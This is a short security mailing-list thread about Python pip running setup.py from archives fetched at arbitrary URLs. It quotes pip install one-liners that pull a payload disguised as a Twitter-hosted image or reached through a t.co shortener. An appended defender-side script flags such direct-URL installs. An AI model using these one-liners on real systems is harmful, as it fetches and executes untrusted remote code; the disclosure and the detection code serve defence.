I don't think these are vulnerabilities per se, but they are definitely sharp edges that clearly most people don't know about. One thought: if there's an "informational" entry, e.g. "python pip will install software, as expected, but can also do so directly from arbitrary URLs"
------------------------------
Kurt Seifried
Chief Blockchain Officer and Director of Special Projects
Cloud Security Alliance
------------------------------
Original Message:
Sent: Oct 27, 2022 11:00:18 AM
From: Kurt Seifried
Subject: Security Glitch: Python pip problems
https://twitter.com/david3141593/status/1584462389977939968?s=43&t=CEmtkaMrle2hJwbdOXjMzw
TIL python's pip will execute a setup.py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"
https://twitter.com/David3141593/status/1584505603799408640
It also follows redirects, so you can use a URL shortener too!
pip install https://t"."co/uPXauf8eTg
------------------------------
Kurt Seifried
Chief Blockchain Officer and Director of Special Projects
Cloud Security Alliance
------------------------------
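A defender-side check for the sharp edge discussed in the thread, added here as an example; it is not code from the original messages or from pip itself. It scans recorded pip command lines (constructed samples below) and flags installs that fetch a requirement or package index directly from a host outside an assumed allow-list, which is how a direct-URL or URL-shortener install would show up in process-creation logs.

```python
import shlex
from urllib.parse import urlparse

# Constructed sample process-creation records (not taken from the thread).
SAMPLE_COMMANDS = [
    "pip install requests",
    "pip3 install --index-url https://pypi.example.internal/simple requests",
    'pip install "https://pbs.twimg.com/media/placeholder.png"',
    "pip install https://t.co/placeholder",
    "python3 -m pip install git+https://github.com/example/project.git",
    "pip install -r requirements.txt",
]

# Assumption: the only hosts an install is expected to fetch from.
ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org", "pypi.example.internal"}

# pip options whose argument changes where packages are fetched from.
SOURCE_OPTIONS = {"-i", "--index-url", "--extra-index-url", "-f", "--find-links"}

def _is_pip_install(argv):
    """True if argv invokes pip's install subcommand (pip, pip3, python -m pip)."""
    i = 0
    if argv and argv[0].startswith("python") and len(argv) > 2 and argv[1] == "-m":
        i = 2
    return len(argv) > i + 1 and argv[i].startswith("pip") and argv[i + 1] == "install"

def _host_of(spec):
    """Host of a URL-style requirement; handles VCS specs such as git+https://..."""
    scheme, sep, rest = spec.partition("://")
    if not sep:
        return None
    return urlparse(f"{scheme.rpartition('+')[-1]}://{rest}").hostname

def flag_pip_url_installs(commands):
    """Return (command, url, reason) for installs fetching from a non-approved host."""
    findings = []
    for cmd in commands:
        argv = shlex.split(cmd)
        if not _is_pip_install(argv):
            continue
        args = iter(argv[argv.index("install") + 1:])
        for arg in args:
            if arg in SOURCE_OPTIONS:
                arg = next(args, "")
                reason = "package source option points to non-approved host"
            else:
                reason = "requirement is a direct URL, not an index lookup"
            host = _host_of(arg)
            if host and host not in ALLOWED_HOSTS:
                findings.append((cmd, arg, reason))
    return findings

if __name__ == "__main__":
    for cmd, url, reason in flag_pip_url_installs(SAMPLE_COMMANDS):
        print(f"FLAG: {reason}: {url}\n  in: {cmd}")
```

Redirects (the t.co case) are invisible at the command line, so the check flags the shortener host itself rather than trying to resolve it; pairing this with an egress policy that only permits the allow-listed hosts closes the gap the check cannot see.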